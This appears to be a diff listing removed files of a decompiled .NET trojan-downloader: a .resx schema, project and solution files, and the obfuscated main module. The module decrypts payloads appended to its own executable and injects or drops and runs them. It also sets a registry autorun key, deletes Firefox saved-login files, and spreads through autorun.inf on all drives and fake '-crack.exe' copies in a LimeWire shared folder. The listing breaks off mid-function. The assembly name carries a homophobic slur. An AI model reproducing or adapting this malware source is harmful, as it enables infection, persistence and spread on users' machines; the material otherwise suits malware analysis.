mimetype: application/x-microsoft.net.object.binary.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.soap.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
|
||||||
value : The object must be serialized into a byte array
|
|
||||||
: using a System.ComponentModel.TypeConverter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
-->
|
|
||||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
|
||||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
|
||||||
<xsd:element name="root" msdata:IsDataSet="true">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:choice maxOccurs="unbounded">
|
|
||||||
<xsd:element name="metadata">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="assembly">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:attribute name="alias" type="xsd:string" />
|
|
||||||
<xsd:attribute name="name" type="xsd:string" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="data">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="resheader">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:choice>
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:schema>
|
|
||||||
<resheader name="resmimetype">
|
|
||||||
<value>text/microsoft-resx</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="version">
|
|
||||||
<value>2.0</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="reader">
|
|
||||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="writer">
|
|
||||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
</root>
|
|
@ -1,26 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: oxbkThQrMwsXXHSZ6N.CWcrFsCTBcw4hZAfIX
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
using aCAxGo8jUjXrWCMv1a;
|
|
||||||
using System;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
namespace oxbkThQrMwsXXHSZ6N
|
|
||||||
{
|
|
||||||
internal static class CWcrFsCTBcw4hZAfIX
|
|
||||||
{
|
|
||||||
[STAThread]
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private static void tHwBQ9yq8()
|
|
||||||
{
|
|
||||||
Application.EnableVisualStyles();
|
|
||||||
Application.SetCompatibleTextRenderingDefault(false);
|
|
||||||
F6gnBCYuM3Gh9uSkf3.c3FUJW0tbGb2O();
|
|
||||||
Application.Run((Form) new flashplayer.flashplayer());
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,3 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
|
|
||||||
[assembly: AssemblyVersion("0.0.0.0")]
|
|
@ -1,18 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyApplication
|
|
||||||
// Assembly: If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 9FF29E54-20E1-4588-8681-38890A7A949F
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyApplication : ApplicationBase
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,24 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyComputer
|
|
||||||
// Assembly: If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 9FF29E54-20E1-4588-8681-38890A7A949F
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.Devices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
internal class MyComputer : Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyComputer()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,108 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyProject
|
|
||||||
// Assembly: If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 9FF29E54-20E1-4588-8681-38890A7A949F
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.ComponentModel.Design;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[HideModuleName]
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[StandardModule]
|
|
||||||
internal sealed class MyProject
|
|
||||||
{
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
|
|
||||||
|
|
||||||
[HelpKeyword("My.Computer")]
|
|
||||||
internal static MyComputer Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Application")]
|
|
||||||
internal static MyApplication Application
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.User")]
|
|
||||||
internal static User User
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.WebServices")]
|
|
||||||
internal static MyProject.MyWebServices WebServices
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
|
|
||||||
internal sealed class MyWebServices
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override int GetHashCode() => base.GetHashCode();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal new Type GetType() => typeof (MyProject.MyWebServices);
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override string ToString() => base.ToString();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyWebServices()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[ComVisible(false)]
|
|
||||||
internal sealed class ThreadSafeObjectProvider<T> where T : new()
|
|
||||||
{
|
|
||||||
internal T GetInstance
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get
|
|
||||||
{
|
|
||||||
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
|
|
||||||
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
|
|
||||||
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public ThreadSafeObjectProvider()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,49 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
|
||||||
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe-->
|
|
||||||
<PropertyGroup>
|
|
||||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
|
||||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
|
||||||
<ProjectGuid>{5C54454D-872E-42B3-966A-60D16DE5270D}</ProjectGuid>
|
|
||||||
<OutputType>WinExe</OutputType>
|
|
||||||
<AssemblyName>If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol</AssemblyName>
|
|
||||||
<ApplicationVersion>0.0.0.0</ApplicationVersion>
|
|
||||||
<RootNamespace>My</RootNamespace>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugSymbols>true</DebugSymbols>
|
|
||||||
<DebugType>full</DebugType>
|
|
||||||
<Optimize>false</Optimize>
|
|
||||||
<OutputPath>bin\Debug\</OutputPath>
|
|
||||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugType>pdbonly</DebugType>
|
|
||||||
<Optimize>true</Optimize>
|
|
||||||
<OutputPath>bin\Release\</OutputPath>
|
|
||||||
<DefineConstants>TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Reference Include="Microsoft.VisualBasic" />
|
|
||||||
<Reference Include="System" />
|
|
||||||
<Reference Include="System.Windows.Forms" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Compile Include="rp.cs" />
|
|
||||||
<Compile Include="UWLUFUDALKLWDKKSWDKFWOIKK97.cs" />
|
|
||||||
<Compile Include="MyApplication.cs" />
|
|
||||||
<Compile Include="MyComputer.cs" />
|
|
||||||
<Compile Include="MyProject.cs" />
|
|
||||||
<Compile Include="AssemblyInfo.cs" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<EmbeddedResource Include="write.dat" />
|
|
||||||
</ItemGroup>
|
|
||||||
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
|
|
||||||
</Project>
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol", "Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.csproj", "{5C54454D-872E-42B3-966A-60D16DE5270D}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{5C54454D-872E-42B3-966A-60D16DE5270D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
{5C54454D-872E-42B3-966A-60D16DE5270D}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{5C54454D-872E-42B3-966A-60D16DE5270D}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{5C54454D-872E-42B3-966A-60D16DE5270D}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
@ -1,323 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: UWLUFUDALKLWDKKSWDKFWOIKK97
|
|
||||||
// Assembly: If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 9FF29E54-20E1-4588-8681-38890A7A949F
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using Microsoft.Win32;
|
|
||||||
using My;
|
|
||||||
using System;
|
|
||||||
using System.Collections;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.IO;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Text;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
[StandardModule]
|
|
||||||
public sealed class UWLUFUDALKLWDKKSWDKFWOIKK97
|
|
||||||
{
|
|
||||||
[STAThread]
|
|
||||||
public static void Main()
|
|
||||||
{
|
|
||||||
string[] strArray1 = Strings.Split(File.ReadAllText(Application.ExecutablePath), "&^Q@#&*$^*&!@$");
|
|
||||||
string[] strArray2 = Strings.Split(rp.eqwrsdafasdf(strArray1[1], strArray1[2]), "AJJFIOEURASJFKLJSAIODF");
|
|
||||||
if (Operators.CompareString(strArray2[1], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
if (strArray2[11].Contains(".exe"))
|
|
||||||
{
|
|
||||||
rp.inject(Encoding.Default.GetBytes(strArray2[1]));
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[11], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[1], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[11]);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[2], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[12], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[2], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[12]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[3], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[13], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[3], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[13]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[4], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[14], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[4], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[14]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[5], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[15], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[5], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[15]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[6], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[16], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[6], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[16]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[7], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[17], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[7], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[17]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[8], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[18], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[8], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[18]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[9], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[19], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[9], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[19]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[10], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[20], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[10], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[20]);
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[21]))
|
|
||||||
{
|
|
||||||
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK16(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "~`rdrFZ"));
|
|
||||||
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK16(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@^GT]T"));
|
|
||||||
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK17();
|
|
||||||
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK18();
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[22]))
|
|
||||||
{
|
|
||||||
if (!File.Exists(Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV")))
|
|
||||||
File.Copy(Assembly.GetExecutingAssembly().Location, Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV"));
|
|
||||||
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@\\UCFRAVk|ZPAXB\\UGkfZ]WXF@opBCAV]CgVA@^^]oaB_"), true);
|
|
||||||
registryKey.SetValue(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "~ZPE^@\\UC\u0011p\\]QXTFAVEZ\\]"), (object) (Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV")));
|
|
||||||
registryKey.Close();
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[23]))
|
|
||||||
{
|
|
||||||
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
|
|
||||||
if (Directory.Exists(str))
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
|
|
||||||
{
|
|
||||||
if (file.Contains("signon"))
|
|
||||||
MyProject.Computer.FileSystem.DeleteFile(file);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
IEnumerator<string> enumerator;
|
|
||||||
enumerator?.Dispose();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
IEnumerator<string> enumerator;
|
|
||||||
enumerator?.Dispose();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[24]))
|
|
||||||
{
|
|
||||||
string[] logicalDrives = Directory.GetLogicalDrives();
|
|
||||||
int index = 0;
|
|
||||||
while (index < logicalDrives.Length)
|
|
||||||
{
|
|
||||||
string str = logicalDrives[index];
|
|
||||||
if (!File.Exists(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@VGBA\u001DVKR")))
|
|
||||||
File.Copy(Assembly.GetExecutingAssembly().Location, str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@VGBA\u001DVKR"));
|
|
||||||
StreamWriter streamWriter = new StreamWriter(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "RFGXCF]\u001D^_U"));
|
|
||||||
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "hRFC^AF]j"));
|
|
||||||
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "\\CVY\f@VGBA\u001DVKR"));
|
|
||||||
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@[V[]VKVTDGV\u000EDTGFC\u0019TKV"));
|
|
||||||
streamWriter.Close();
|
|
||||||
File.SetAttributes(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "RFGXCF]\u001D^_U"), FileAttributes.Hidden);
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[25]))
|
|
||||||
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK26("C:\\", Application.ExecutablePath);
|
|
||||||
if (Conversions.ToBoolean(strArray2[26]))
|
|
||||||
{
|
|
||||||
int num = 0;
|
|
||||||
foreach (object obj in new ArrayList()
|
|
||||||
{
|
|
||||||
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\limewire\\shared\\")
|
|
||||||
})
|
|
||||||
{
|
|
||||||
string path = Convert.ToString(RuntimeHelpers.GetObjectValue(obj));
|
|
||||||
if (Directory.Exists(path))
|
|
||||||
{
|
|
||||||
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
|
|
||||||
int index = 0;
|
|
||||||
while (index < directories.Length)
|
|
||||||
{
|
|
||||||
string str = directories[index];
|
|
||||||
string destFileName = path + "\\" + str.Substring(str.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
|
|
||||||
